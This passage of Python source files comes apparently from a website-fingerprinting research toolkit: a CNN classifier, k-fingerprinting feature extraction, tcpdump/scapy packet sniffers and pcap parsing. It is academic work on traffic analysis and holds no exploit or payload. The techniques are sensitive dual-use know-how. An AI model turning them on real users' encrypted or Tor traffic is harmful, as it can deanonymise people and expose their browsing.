model.add(layers.Dropout(0.1, name='block4_dropout'))
model.add(layers.Flatten(name='flatten'))
model.add(layers.Dense(
512, kernel_initializer=initializers.glorot_uniform(seed=0),
name='fc1'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='fc1_act'))
model.add(layers.Dropout(0.7, name='fc1_dropout'))
model.add(layers.Dense(
512, kernel_initializer=initializers.glorot_uniform(seed=0),
name='fc2'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='fc2_act'))
model.add(layers.Dropout(0.5, name='fc2_dropout'))
model.add(layers.Dense(
n_classes, kernel_initializer=initializers.glorot_uniform(seed=0),
name='fc3'))
model.add(layers.Activation('softmax', name="softmax"))
model.compile(
loss="categorical_crossentropy",
optimizer=keras.optimizers.Adamax(
lr=0.002, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0),
metrics=["accuracy"])
return model
class DeepFingerprintingClassifier(ModifiedKerasClassifier):
"""Website fingerprinting classifer using a CNN."""
def __init__(self, **kwargs):
super().__init__(build_fn=build_model, **kwargs)
def __repr__(self) -> str:
params = self.filter_sk_params(build_model)
return "DeepFingerprintingClassifier({})".format(
", ".join(f"{arg}={value!r}" for arg, value in params.items()))
```
#### File: classifiers/kfingerprinting/_features.py
```python
import math
import logging
import itertools
import functools
import tempfile
from typing import Tuple, Union, Sequence, Optional
import multiprocessing
import h5py
import numpy as np
from lab.trace import Direction, Trace
DEFAULT_NUM_FEATURES = 165
_LOGGER = logging.getLogger(__name__)
# --------------------
# Non-feeder functions
# --------------------
def split_in_out(list_data: Trace, check: bool = True) -> Tuple[Trace, Trace]:
"""Returns a tuple of the packets in the (incoming, outgoing) subtraces.
Raise AssertionError if check is true and the trace has no incoming or no
outgoing packets.
"""
# Use a fast-path for np record arrays
if isinstance(list_data, np.recarray):
incoming = list_data[list_data["direction"] < 0]
outgoing = list_data[list_data["direction"] > 0]
else:
incoming = [pkt for pkt in list_data if pkt.direction == Direction.IN]
outgoing = [pkt for pkt in list_data if pkt.direction == Direction.OUT]
if check:
assert len(incoming) > 0 and len(outgoing) > 0
return (incoming, outgoing)
def _get_timestamps(array_like) -> np.ndarray:
if isinstance(array_like, np.recarray):
return array_like["timestamp"]
return np.array([x[0] for x in array_like])
# -------------
# TIME FEATURES
# -------------
def _inter_pkt_time(list_data):
if len(list_data) == 1:
return [0.0, ]
times = _get_timestamps(list_data)
return (np.concatenate((times[1:], [times[0]])) - times)[:-1]
def interarrival_times(list_data):
"""Return the interarrival times of the incoming, outgoing, and overall
packet sequences.
"""
incoming, outgoing = split_in_out(list_data)
inter_in = _inter_pkt_time(incoming)
inter_out = _inter_pkt_time(outgoing)
inter_overall = _inter_pkt_time(list_data)
return inter_in, inter_out, inter_overall
def _prefix_keys(mapping: dict, prefix: Union[str, Sequence[str]]) -> dict:
if not isinstance(prefix, str):
prefix = '::'.join(prefix)
return {f'{prefix}::{key}': mapping[key] for key in mapping}
def _interarrival_stats(times: Sequence[float]) -> dict:
return {
'mean': np.mean(times) if len(times) > 0 else 0,
'max': max(times, default=0),
'std': np.std(times) if len(times) > 0 else 0,
'percentile-75': np.percentile(times, 75) if len(times) > 0 else 0
}
def interarrival_stats(list_data: Trace) -> dict:
"""Extract the mean, std, max, 75th-percentile for the incoming,
outgoing, and overall traces.
"""
incoming, outgoing, overall = interarrival_times(list_data)
return {
**_prefix_keys(_interarrival_stats(incoming), ['interarrival', 'in']),
**_prefix_keys(_interarrival_stats(outgoing), ['interarrival', 'out']),
**_prefix_keys(_interarrival_stats(overall),
['interarrival', 'overall']),
}
def time_percentiles(overall: Trace) -> dict:
"""Return the 25th, 50th, 75th and 100th percentiles of the timestamps."""
incoming, outgoing = split_in_out(overall)
def _percentiles(trace):
times = _get_timestamps(trace)
return {f'percentile-{p}': (np.percentile(times, p)
if len(times) > 0 else 0)
for p in [25, 50, 75, 100]}
return {
**_prefix_keys(_percentiles(incoming), ['time', 'in']),
**_prefix_keys(_percentiles(outgoing), ['time', 'out']),
**_prefix_keys(_percentiles(overall), ['time', 'overall']),
}
def packet_counts(overall: Trace) -> dict:
"""Return the number of incoming, outgoing and combined packets."""
incoming, outgoing = split_in_out(overall, check=False)
return {
'packet-counts::in': len(incoming),
'packet-counts::out': len(outgoing),
'packet-counts::overall': len(overall)
}
def head_and_tail_concentration(overall: Trace, count: int) -> dict:
"""Return the number of incoming and outgoing packets in the first and last
'count' packets of the trace.
"""
assert count > 0
head = packet_counts(overall[:count])
del head['packet-counts::overall']
tail = packet_counts(overall[-count:])
del tail['packet-counts::overall']
return {
**_prefix_keys(head, f'first-{count}'),
**_prefix_keys(tail, f'last-{count}')
}
def packet_concentration_stats(overall: Trace, chunk_size: int) \
-> Tuple[dict, Sequence[int]]:
"""Return the std, mean, min, max and median of the number of
outgoing packets in each chunk of the trace; as well as the
sequence of outgoing concentrations.
Each chunk is created with 'chunk_size' packets.
"""
concentrations = []
for index in range(0, len(overall), chunk_size):
chunk = overall[index:(index + chunk_size)]
concentrations.append(packet_counts(chunk)['packet-counts::out'])
return _prefix_keys({
'std::out': np.std(concentrations),
'mean::out': np.mean(concentrations),
'median::out': np.median(concentrations),
'min::out': min(concentrations),
'max::out': max(concentrations),
}, 'concentration-stats'), concentrations
def alternate_concentration(concentration: Sequence[int], length: int) \
-> Sequence[int]:
"""Return a fixed length sequence of the number of outgoing packets.
The sequence of concentrations, where each value is the number of
outgoing packets in a set of 20, is then partitioned into 20 sequences
and each sequence is summed. This roughly equates to divide the original
sequence into 20 and counting the # of outgoing packets in each. They
differ as the resulting groups may slighly vary depending on the length
of the sequence. We therefore use the approach from the paper.
"""
# We use the array_split implementation as the chunkIt code was flawed and
# may return more chunks than requested.
result = [sum(group) for group in np.array_split(concentration, length)]
assert len(result) == length
return result
def alternate_packets_per_second(pps: Sequence[int], length: int) \
-> Tuple[dict, Sequence[int]]:
"""Return a fixed length sequence of the pps rate, as well as the sum of
the rate
"""
# We use the array_split implementation as the chunkIt code was flawed and
# may return more chunks than requested.
result = [sum(group) for group in np.array_split(pps, length)]
assert len(result) == length
return {'alt-pps::sum': sum(result)}, result
def packets_per_second_stats(overall: Trace) \
-> Tuple[dict, Sequence[int]]:
"""Return the mean, std, min, median and max number of packets per
second, as well as the number of packets each second.
"""
n_seconds = math.ceil(overall[-1].timestamp)
packets_per_sec, _ = np.histogram(
_get_timestamps(overall), bins=n_seconds, range=(0, n_seconds))
packets_per_sec = list(packets_per_sec)
return {
'pps::mean': np.mean(packets_per_sec),
'pps::std': np.std(packets_per_sec),
'pps::median': np.median(packets_per_sec),
'pps::min': min(packets_per_sec),
'pps::max': max(packets_per_sec)
}, packets_per_sec
def packet_ordering_stats(overall: Trace) -> dict:
"""Mean and std of a variant of the packet ordering features."""
# Note that the ordering here is different from the k-fingerprinting
# reference implementation. They have out and in swapped.
if isinstance(overall, np.recarray):
in_preceeding = np.nonzero(overall["direction"] < 0)[0]
out_preceeding = np.nonzero(overall["direction"] > 0)[0]
else:
in_preceeding = [i for i, pkt in enumerate(overall)
if pkt.direction == Direction.IN]
out_preceeding = [i for i, pkt in enumerate(overall)
if pkt.direction == Direction.OUT]
return {
'packet-order::out::mean': np.mean(out_preceeding),
'packet-order::in::mean': np.mean(in_preceeding),
'packet-order::out::std': np.std(out_preceeding),
'packet-order::in::std': np.std(in_preceeding),
}
def in_out_fraction(overall: Trace) -> dict:
"""Return the fraction of incoming and outgoing packets."""
counts = packet_counts(overall)
n_packets = counts['packet-counts::overall']
return {
'fraction-incoming': counts['packet-counts::in'] / n_packets,
'fraction-outgoing': counts['packet-counts::out'] / n_packets
}
# -------------
# SIZE FEATURES
# -------------
def _get_sizes(array_like):
if isinstance(array_like, np.recarray):
return array_like["size"]
return [x[2] for x in array_like]
def total_packet_sizes(overall: Trace) -> dict:
"""Return the total incoming, outgoing and overall packet sizes."""
incoming, outgoing = split_in_out(overall)
# Use absolute value in case the input sizes are signed
result = {
'total-size::in': np.sum(np.abs(_get_sizes(incoming))),
'total-size::out': np.sum(np.abs(_get_sizes(outgoing))),
}
result['total-size::overall'] = result['total-size::in'] \
+ result['total-size::out']
return result
def _packet_size_stats(trace: Trace) -> dict:
sizes = _get_sizes(trace)
return {
'mean': np.mean(sizes), 'var': np.var(sizes),
'std': np.std(sizes), 'max': np.max(sizes)
}
def packet_size_stats(overall: Trace) -> dict:
"""Return the mean, var, std, and max of the incoming, outgoing,
and overall packet traces.
"""
incoming, outgoing = split_in_out(overall)
return {
**_prefix_keys(_packet_size_stats(incoming), 'size-stats::in'),
**_prefix_keys(_packet_size_stats(outgoing), 'size-stats::out'),
**_prefix_keys(_packet_size_stats(overall), 'size-stats::overall'),
}
# ----------------
# FEATURE FUNCTION
# ----------------
def make_trace_array(
timestamps: Sequence[float], sizes: Sequence[float]
) -> np.ndarray:
"""Create a trace-like array from the sequence of timestamps and
signed sizes.
"""
assert len(timestamps) == len(sizes)
trace_array = np.recarray((len(timestamps), ), dtype=[
# Use i8 for sizes since we may be doing operations which overflow
("timestamp", "f8"), ("direction", "i1"), ("size", "i8")
])
trace_array["timestamp"] = timestamps
sizes = np.asarray(sizes, dtype=int)
np.sign(sizes, out=trace_array["direction"])
np.abs(sizes, out=trace_array["size"])
return trace_array
def _run_extraction(idx, directory: str, max_size: int):
# Use copies so that the original memory of the full file may be freed
with h5py.File(f"{directory}/data.hdf", mode="r") as h5file:
sizes = np.asarray(h5file["sizes"][idx], dtype=np.object)
times = np.asarray(h5file["timestamps"][idx], dtype=np.object)
return _extract_features_local(
timestamps=times, sizes=sizes, max_size=max_size)
def _extract_features_mp(
timestamps: Sequence[Sequence[float]], sizes: Sequence[Sequence[float]],
max_size: int = DEFAULT_NUM_FEATURES, n_jobs: Optional[int] = None
) -> np.ndarray:
features = np.zeros((len(sizes), max_size), float)
# Serialise the timestamps and sizes to file
with tempfile.TemporaryDirectory(prefix="kfp-extract-") as directory:
with h5py.File(f"{directory}/data.hdf", mode="w") as h5file:
dtype = h5py.vlen_dtype(np.dtype("float"))
h5file.create_dataset("sizes", data=sizes, dtype=dtype)
h5file.create_dataset("timestamps", data=timestamps, dtype=dtype)
offset = 0
# Use our own splits as imap chunking would yield them one at a time
chunksize = 5000
n_chunks = max(len(sizes) // chunksize, 1)
splits = np.array_split(np.arange(len(sizes)), n_chunks)
assert n_chunks == len(splits)
_LOGGER.info("Extracting features in %d batches...", n_chunks)
with multiprocessing.Pool(n_jobs) as pool:
# Pass the filenames and indices to the background process
for i, batch in enumerate(pool.imap(
functools.partial(
_run_extraction, directory=directory, max_size=max_size),
splits, chunksize=1
)):
# Recombine them filenames and indices
features[offset:offset+len(batch), :] = batch
offset += len(batch)
_LOGGER.info("Extraction is %.2f%% complete.",
((i+1) * 100 / n_chunks))
return features
def _extract_features_local(
timestamps: Sequence[Sequence[float]], sizes: Sequence[Sequence[float]],
max_size: int = DEFAULT_NUM_FEATURES
) -> np.ndarray:
features = np.ndarray((len(sizes), max_size), dtype=float)
for i, (size_row, times_row) in enumerate(zip(sizes, timestamps)):
features[i] = extract_features(
timestamps=times_row, sizes=size_row, max_size=max_size)
return features
def extract_features_sequence(
trace: Optional[Sequence[Trace]] = None,
max_size: int = DEFAULT_NUM_FEATURES,
timestamps: Optional[Sequence[Sequence[float]]] = None,
sizes: Optional[Sequence[Sequence[float]]] = None,
n_jobs: Optional[int] = 1
) -> np.ndarray:
"""Convenience method around extract_features that accepts a
sequence of timestamps and sizes for multiple samples.
If n_jobs is provided, use multiple processes to extract the
features. An n_jobs of None will use all available processes
"""
if trace is not None:
raise NotImplementedError("Trace input not currently supported.")
assert timestamps is not None
assert sizes is not None
if n_jobs != 1:
_LOGGER.info("Extracting features using %r processes", n_jobs)
return _extract_features_mp(
timestamps=timestamps, sizes=sizes, max_size=max_size,
n_jobs=n_jobs)
_LOGGER.info("Extracting features locally.")
return _extract_features_local(
timestamps=timestamps, sizes=sizes, max_size=max_size)
def extract_features(
trace: Trace = None, max_size: int = DEFAULT_NUM_FEATURES,
timestamps: Optional[Sequence[float]] = None,
sizes: Optional[Sequence[float]] = None
) -> np.ndarray:
"""Return a tuple of features of the specified size, according to the paper
Hayes, Jamie, and <NAME>. "k-fingerprinting: A robust
scalable website fingerprinting technique." 25th {USENIX} Security
Symposium ({USENIX} Security 16). 2016.
Either trace or both sizes and timestamps must be specified.
"""
if trace is None and (timestamps is None or sizes is None):
raise ValueError("timestamps and sizes must be specified when trace is "
"None.")
if trace is not None and (timestamps is not None or sizes is not None):
raise ValueError("Either trace or both sizes and timestamps should be "
"specified.")
if trace is None:
assert timestamps is not None and sizes is not None
trace = make_trace_array(timestamps=timestamps, sizes=sizes)
assert trace[0].timestamp == 0
all_features = {}
all_features.update(interarrival_stats(trace))
all_features.update(time_percentiles(trace))
all_features.update(packet_counts(trace))
all_features.update(head_and_tail_concentration(trace, 30))
stats, concentrations = packet_concentration_stats(trace, 20)
all_features.update(stats)
stats, pps = packets_per_second_stats(trace)
all_features.update(stats)
all_features.update(packet_ordering_stats(trace))
all_features.update(in_out_fraction(trace))
all_features.update(total_packet_sizes(trace))
all_features.update(packet_size_stats(trace))
result = [all_features[feat] for feat in DEFAULT_TIMING_FEATURES]
# Alternate concentration feature
result.extend(alternate_concentration(concentrations, 20))
# Alternate packets per second features
stats, alt_pps = alternate_packets_per_second(pps, 20)
result.extend(alt_pps)
result.append(stats['alt-pps::sum'])
# Assert on the length of the core features from the paper
assert len(result) == 87
result.extend(all_features[feat] for feat in DEFAULT_SIZE_FEATURES)
# Assert on the overall length of the sizes and timing features
assert len(result) == 102
remaining_space = max_size - len(result)
# Align the concentrations and pps features, by allocating each roughly
# Half of the remaining space, padding with zero otherwise
if remaining_space > 0:
_extend_exactly(result, concentrations, (remaining_space + 1) // 2)
_extend_exactly(result, pps, remaining_space // 2)
assert len(result) == max_size
return np.asarray(result[:max_size])
def _extend_exactly(lhs, rhs, amount: int, padding: int = 0):
"""Extend lhs, with exactly amount elements from rhs. If there are
not enough elements, lhs is padded to the correct amount with padding.
"""
padding_len = amount - len(rhs) # May be negative
lhs.extend(rhs[:amount])
lhs.extend([padding] * padding_len) # NO-OP if padding_len is negative
DEFAULT_TIMING_FEATURES = [
# Interarrival stats
'interarrival::in::max', 'interarrival::out::max',
'interarrival::overall::max', 'interarrival::in::mean',
'interarrival::out::mean', 'interarrival::overall::mean',
'interarrival::in::std', 'interarrival::out::std',
'interarrival::overall::std', 'interarrival::in::percentile-75',
'interarrival::out::percentile-75', 'interarrival::overall::percentile-75',
# Timestamp percentiles
'time::in::percentile-25', 'time::in::percentile-50',
'time::in::percentile-75', 'time::in::percentile-100',
'time::out::percentile-25', 'time::out::percentile-50',
'time::out::percentile-75', 'time::out::percentile-100',
'time::overall::percentile-25', 'time::overall::percentile-50',
'time::overall::percentile-75', 'time::overall::percentile-100',
# Packet counts
'packet-counts::in', 'packet-counts::out', 'packet-counts::overall',
# First and last 30 packet concentrations
'first-30::packet-counts::in', 'first-30::packet-counts::out',
'last-30::packet-counts::in', 'last-30::packet-counts::out',
# Some concentration stats
'concentration-stats::std::out', 'concentration-stats::mean::out',
# Some packets per-second stats
'pps::mean', 'pps::std',
# Packet ordering statistics
'packet-order::out::mean', 'packet-order::in::mean',
'packet-order::out::std', 'packet-order::in::std',
# Concentration stats ctd.
'concentration-stats::median::out',
# Remaining packet per second stats
'pps::median', 'pps::min', 'pps::max',
# Concentration stats ctd.
'concentration-stats::max::out',
# Fraction of packets in each direction
'fraction-incoming', 'fraction-outgoing',
]
DEFAULT_SIZE_FEATURES = [
# Total sizes
'total-size::in', 'total-size::out', 'total-size::overall',
# Size statistics
'size-stats::in::mean', 'size-stats::in::max', 'size-stats::in::var',
'size-stats::in::std',
'size-stats::out::mean', 'size-stats::out::max', 'size-stats::out::var',
'size-stats::out::std',
'size-stats::overall::mean', 'size-stats::overall::max',
'size-stats::overall::var', 'size-stats::overall::std',
]
ALL_DEFAULT_FEATURES = list(itertools.chain(
DEFAULT_TIMING_FEATURES,
[f'alt-conc::{i}' for i in range(20)],
[f'alt-pps::{i}' for i in range(20)],
['alt-pps::sum'],
DEFAULT_SIZE_FEATURES,
[f'conc::{i}' for i in range((DEFAULT_NUM_FEATURES - 102 + 1) // 2)],
[f'pps::{i}' for i in range((DEFAULT_NUM_FEATURES - 102) // 2)]
))
```
#### File: wf-tools/lab/sniffer.py
```python
import io
import abc
from abc import abstractmethod
import time
import logging
import threading
from typing import Optional, IO, List
import signal
import tempfile
import subprocess
from subprocess import CompletedProcess, CalledProcessError
try:
import scapy
import scapy.compat
import scapy.plist
import scapy.sendrecv
import scapy.utils
from scapy.layers import inet, l2
# Enable parsing only to the level of UDP and TCP packets
l2.Ether.payload_guess = [({"type": 0x800}, inet.IP)]
inet.IP.payload_guess = [
({"frag": 0, "proto": 0x11}, inet.UDP), ({"proto": 0x06}, inet.TCP)
]
inet.UDP.payload_guess = []
inet.TCP.payload_guess = []
except ImportError:
USE_SCAPY = False
else:
USE_SCAPY = True
class SnifferStartTimeout(Exception):
"""Raised when the sniffer fails to start due to a timeout."""
class PacketSniffer(abc.ABC):
"""Base class for packet sniffers."""
@property
def results(self) -> bytes:
"""Alias for pcap"""
return self.pcap()
@abstractmethod
def pcap(self) -> bytes:
"""Return the pcap as bytes."""
@abstractmethod
def start(self) -> None:
"""Begin capturing packets."""
@abstractmethod
def stop(self) -> None:
"""Stop capturing packets."""
if USE_SCAPY:
class ScapyPacketSniffer(PacketSniffer):
"""Class for capturing network traffic."""
stop_delay = 1
def __init__(self, capture_filter: str = 'tcp or udp',
snaplen: Optional[int] = None, **kwargs):
def _started_callback():
with self._start_condition:
self._started = True
self._start_condition.notify_all()
self._logger = logging.getLogger(__name__)
self._filter = capture_filter
self._start_condition = threading.Condition()
self._started = False
self._sniffer = scapy.sendrecv.AsyncSniffer(
filter=capture_filter,
started_callback=_started_callback,
promisc=False,
**kwargs,
)
self.snaplen = snaplen
def _truncate_pcap(self, pcap: bytes) -> bytes:
assert self.snaplen is not None and self.snaplen > 0
command = ['editcap', '-F', 'pcap',
'-s', str(self.snaplen), '-', '-']
process = subprocess.Popen(
command, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate(pcap)
if process.returncode != 0:
raise subprocess.CalledProcessError(
process.returncode, ' '.join(command), stdout, stderr)
return stdout
def pcap(self) -> bytes:
"""Returns the results in pcap format serialised to bytes."""
pcap = ScapyPacketSniffer.to_pcap(self._sniffer.results)
if self.snaplen:
self._logger.info("Truncating packets to %d bytes",
self.snaplen)
pcap = self._truncate_pcap(pcap)
return pcap
@staticmethod
def to_pcap(packet_list: scapy.plist.PacketList) -> bytes:
"""Encodes the provided packet list in PCAP format."""
byte_buffer = io.BytesIO()
with scapy.utils.PcapWriter(byte_buffer) as writer:
writer.write(packet_list)
writer.flush()
# PcapWriter will close the bytebuffer so must return in 'with'
return byte_buffer.getvalue()
def start(self) -> None:
"""Start capturing packets."""
with self._start_condition:
self._sniffer.start()
notified = self._start_condition.wait_for(lambda: self._started,
timeout=5)
if not notified:
raise SnifferStartTimeout()
self._logger.info('Began sniffing for traffic with filter "%s"',
self._filter)
def stop(self) -> None:
"""Stop capturing packets."""
self._logger.info('Waiting %.2fs for sniffer to flush',
self.stop_delay)
time.sleep(self.stop_delay)
try:
self._sniffer.stop()
except OSError as err:
if err.errno != 9:
raise
if self._sniffer.running:
self._logger.fatal('%s has been raised by the sniffer but '
'the sniffer is still running.', err)
raise
self._logger.info('%s has been suppressed as the sniffer is not'
' running.', err)
if not self._sniffer.results:
self._logger.warning('Sniffing complete but failed to capture '
'packets [result: %s]', self.results)
return
self._sniffer.results = scapy.plist.PacketList(
name='Sniffed',
res=self._sniffer.results,
stats=[inet.TCP, inet.UDP])
self._logger.info('Sniffing complete. %r', self._sniffer.results)
class TCPDumpPacketSniffer(PacketSniffer):
"""A wrapper around TCPDump to perform traffic sniffing."""
start_delay = 2
# How long to wait before terminating the sniffer
stop_delay = 2
buffer_size = 4096
def __init__(
self, capture_filter: str = 'udp or tcp', iface: Optional[str] = None,
snaplen: Optional[int] = None
):
self._log = logging.getLogger(__name__)
self._subprocess: Optional[subprocess.Popen] = None
self._pcap: Optional[IO[bytes]] = None
self.interface = iface or 'any'
self.snaplen = snaplen or 0
self.capture_filter = capture_filter
self._args: List[str] = []
def pcap(self) -> bytes:
assert self._pcap is not None
pcap_bytes = self._pcap.read()
self._pcap.seek(0)
return pcap_bytes
def is_running(self) -> bool:
"""Returns true if the sniffer is running."""
return self._subprocess is not None
def start(self) -> None:
assert not self.is_running()
self._pcap = tempfile.NamedTemporaryFile(mode='rb', suffix='.pcap')
self._args = [
'tcpdump', '-n', '--buffer-size', str(self.buffer_size),
'--interface', self.interface, '--dont-verify-checksums',
'--no-promiscuous-mode', '--snapshot-length', str(self.snaplen),
'-w', self._pcap.name, self.capture_filter]
self._subprocess = subprocess.Popen(
self._args, stdout=subprocess.DEVNULL, stderr=subprocess.PIPE)
time.sleep(self.start_delay)
self._log.info("Started tcpdump: '%s'", ' '.join(self._args))
def _terminate(self) -> CompletedProcess:
assert self.is_running()
assert self._subprocess is not None
if self._subprocess.poll() is None:
# Wait for tcpdump to flush, this may only work because it's in
# packet-buffered & immediate modes
self._log.info('Waiting %.2fs for tcpdump to flush',
self.stop_delay)
time.sleep(self.stop_delay)
stdout, stderr = stop_process(
self._subprocess, timeout=3, name="tcpdump")
return_code = 0
else:
self._log.debug("tcpdump already terminated")
stdout, stderr = self._subprocess.communicate()
return_code = self._subprocess.poll()
return CompletedProcess(self._args, return_code, stdout, stderr)
def stop(self) -> None:
"""Stops sniffing."""
assert self.is_running()
result = self._terminate()
try:
result.check_returncode()
except CalledProcessError as err:
self._log.fatal(
"TCPDump failed with error:\n%s", err.stderr.decode('utf-8'))
raise
else:
n_collected = ', '.join(result.stderr.decode('utf-8').strip()
.split('\n')[-3:])
self._log.info("tcpdump complete: %s", n_collected)
finally:
self._subprocess = None
def stop_process(
process: subprocess.Popen, timeout: int = 5, name: str = ''
) -> tuple:
"""Stop the process by sending SIGINT -> SIGTERM -> SIGKILL, waiting 5
seconds between each pair of signals.
"""
log = logging.getLogger(__name__)
name = name or 'process'
for sig in (signal.SIGINT, signal.SIGTERM, signal.SIGKILL):
log.info("Stopping %s with %s.", name, sig)
next_timeout = None if sig == signal.SIGKILL else timeout
try:
process.send_signal(sig)
return process.communicate(timeout=next_timeout)
except subprocess.TimeoutExpired:
log.info("%s did not stop after %.2fs. Trying next signal",
name, next_timeout)
except subprocess.CalledProcessError as err:
if err.returncode in (signal.SIGTERM, signal.SIGKILL):
return err.stdout, err.stderr
raise
assert False
return None, None
```
#### File: li2018measuring/FeatureUtil/Ngram.py
```python
def NgramLocator(sample, Ng):
# locate which gram in NgramExtract
index = 0
for i in range(0, Ng):
if sample[i] == 1:
bit = 1
else:
bit = 0
index = index + bit * (2**(Ng-i-1))
return index
def NgramExtract(sizes, NGRAM):
# n-gram feature for ordering
counter = 0
buckets = [0]*(2**NGRAM)
for i in range(0, len(sizes)-NGRAM+1):
index = NgramLocator(sizes[i:i+NGRAM], NGRAM)
buckets[index] = buckets[index] + 1
counter = counter + 1
return buckets
```
#### File: li2018measuring/FeatureUtil/PktNum.py
```python
def roundArbitrary(x, base):
return int(base * round(float(x)/base))
# packet number features
def PacketNumFeature(times, sizes, features):
total = len(times)
features.append(total)
# count is outgoing pkt. number
count = 0
for x in sizes:
if x > 0:
count += 1
features.append(count)
features.append(total - count)
# kanonymity also include incoming/total, outgoing/total
out_total = float(count)/total
in_total = float(total - count)/total
features.append( out_total*100 )
features.append( in_total*100 )
# rounded version, from WPES 2011
features.append( roundArbitrary(total, 15) )
features.append( roundArbitrary(count, 15) )
features.append( roundArbitrary(total - count, 15) )
features.append( roundArbitrary(out_total*100, 5) )
features.append( roundArbitrary(in_total*100, 5) )
# packet size in total (or called bandwidth)
# should be the same with packet number, but anyway, include them
features.append(total*512)
features.append(count*512)
features.append( (total-count)*512 )
```
#### File: li2018measuring/FeatureUtil/TransPosition.py
```python
import numpy
#Transpositions (similar to good distance scheme)
# how many packets are in front of the outgoing/incoming packet?
def TransPosFeature(times, sizes, features):
# for outgoing packets
count = 0
temp = []
for i in range(0, len(sizes)):
if sizes[i] > 0:
count += 1
features.append(i)
temp.append(i)
if count == 300:
break
for i in range(count, 300):
features.append("X")
# std
features.append(numpy.std(temp))
# ave
features.append(numpy.mean(temp))
# for incoming packets
count = 0
temp = []
for i in range(0, len(sizes)):
if sizes[i] < 0:
count += 1
features.append(i)
temp.append(i)
if count == 300:
break
for i in range(count, 300):
features.append("X")
# std
features.append(numpy.std(temp))
# ave
features.append(numpy.mean(temp))
```
#### File: third_party/li2018measuring/util.py
```python
from .Param import *
import os
def PathReader(keyword):
# ID_PATH is where crawl id are recorded
global DATASET_PATH, ID_PATH
f = open(ID_PATH + keyword, 'r')
crawl = list()
for each_line in f.readlines():
path_temp = each_line.strip('\n')[0:-1]
name = os.path.basename(path_temp)
crawl.append(DATASET_PATH + keyword + '/' + name + '/')
return crawl
# normalize traffic
def NormalizeTraffic(times, sizes):
# sort
tmp = sorted(zip(times, sizes))
times = [x for x, _ in tmp]
sizes = [x for _, x in tmp]
TimeStart = times[0]
PktSize = 500
# normalize time
for i in range(len(times)):
times[i] = times[i] - TimeStart
# normalize size
for i in range(len(sizes)):
sizes[i] = ( abs(sizes[i])/PktSize )*cmp(sizes[i], 0)
# flat it
newtimes = list()
newsizes = list()
for t, s in zip(times, sizes):
numCell = abs(s)
oneCell = cmp(s, 0)
for r in range(numCell):
newtimes.append(t)
newsizes.append(oneCell)
times = newtimes
sizes = newsizes
# TrafficReformat
def TrafficReformat(line):
comp = line.split(',')
time = comp[0]
pkt = comp[7]
return [time, pkt]
```
#### File: wf-tools/lab/trace.py
```python
import io
import json
import logging
import itertools
import subprocess
from enum import IntEnum
from ipaddress import IPv4Network, IPv6Network, ip_address
from typing import List, NamedTuple, Tuple, Union, Optional
import dataclasses
from dataclasses import dataclass
from mypy_extensions import TypedDict
import pandas as pd
Trace = List["Packet"]
IPNetworkType = Union[IPv4Network, IPv6Network]
_LOGGER = logging.getLogger(__name__)
class Direction(IntEnum):
"""The direction of a packet, incoming or outgoing."""
IN = -1 # pylint: disable=invalid-name
OUT = 1
class Packet(NamedTuple):
"""A packet in a trace.
An outgoing packet has a direction of 1 and an incoming packet has a
direction of -1. The size of the packet is in bytes.
"""
timestamp: float
direction: Direction
size: int
class ClientIndeterminable(Exception):
"""Raised if it is not possible to determine the client from the sequence of
packets.
"""
class PcapParsingError(Exception):
"""Raised when we fail to parse the pcap."""
def _determine_client_ip(packets: pd.DataFrame, client_subnet) -> str:
"""Determines the IP address of the client from the sequence of packets.
Raises ClientIndeterminable on failure.
"""
# The client must of course be one of the senders
unique_ips = packets['ip.src'].unique()
candidates = [ip for ip in unique_ips if ip_address(ip) in client_subnet]
if not candidates:
# There were no IPs from the source in the subnet. This can happen
# due to tcpdump being overloaded and dropping packets. See if we can
# find the client IP in the destination IPs
unique_ips = set(unique_ips)
unique_ips.update(packets['ip.dst'].unique())
candidates = [ip for ip in unique_ips if ip_address(ip) in
client_subnet]
if not candidates:
raise ClientIndeterminable(
f"No source nor destination IPs were in the subnet: {unique_ips}.")
if len(candidates) > 1:
raise ClientIndeterminable(f"Too many client candidates {candidates}.")
return candidates[0]
def pcap_to_trace(
pcap: bytes, client_subnet: IPNetworkType,
display_filter: Optional[str] = None
) -> Tuple[Trace, pd.DataFrame]:
"""Converts a pcap to a packet trace."""
packets = load_pcap(pcap, str(client_subnet), display_filter)
if len(packets) == 0:
return [], packets
client = _determine_client_ip(packets, client_subnet)
packets['direction'] = Direction.OUT
packets['direction'] = packets['direction'].where(
packets['ip.src'] == client, Direction.IN)
zero_time = packets['frame.time_epoch'].iloc[0]
packets['frame.time_epoch'] = packets['frame.time_epoch'] - zero_time
trace = [Packet(*fields) for fields in zip(
packets['frame.time_epoch'], packets['direction'], packets['ip.len'])]
return trace, packets
def load_pcap(
pcap: bytes, client_subnet: str, display_filter: Optional[str] = None
) -> pd.DataFrame:
"""Load the pcap into a dataframe. Packets are filtered to those
with an endpoint in client_subnet.
"""
fields = ['frame.time_epoch', 'ip.src', 'ip.dst', 'ip.len', 'udp.stream',
'tcp.stream']
filter_ip = f'ip.src == {client_subnet} or ip.dst == {client_subnet}'
display_filter = (f'({filter_ip}) and ({display_filter})'
if display_filter else filter_ip)
command = ['tshark', '-r', '-', '-Y', display_filter,
'-Tfields', '-E', 'header=y', '-E', 'separator=,'] + list(
itertools.chain.from_iterable(('-e', field) for field in fields))
try:
result = subprocess.run(
command, input=pcap, check=True, capture_output=True)
except subprocess.CalledProcessError as err:
raise PcapParsingError(err.stderr.decode("utf-8").strip()) from err
return (pd.read_csv(io.BytesIO(result.stdout))
.sort_values(by='frame.time_epoch'))
TraceStats = TypedDict('TraceStats', {
'udp-flows': int, 'tcp-flows': int, 'udp-bytes': int, 'tcp-bytes': int
})
@dataclass
class TraceData:
"""Serialisable information pertaining to a traffic trace.
Attributes
----------
url :
The url fetched in the trace.
protocol :
The protocol associated with the trace.
connections :
Counts of the number of 'udp' and 'tcp' flows in the trace,
where each flow is identified by the IP-port 4-tuple. As well as the
total bytes sent via UDP & TCP
trace :
The encoded traffic trace
"""
url: str
protocol: str
connections: Optional[TraceStats]
trace: Trace
region: Optional[str] = None
def serialise(self) -> str:
"""Serialise the trace info to a string for writing to a file."""
return json.dumps(dataclasses.asdict(self))
@classmethod
def deserialise(cls, value: str) -> 'TraceData':
"""Deserialise a TraceData object from a string."""
data = json.loads(value)
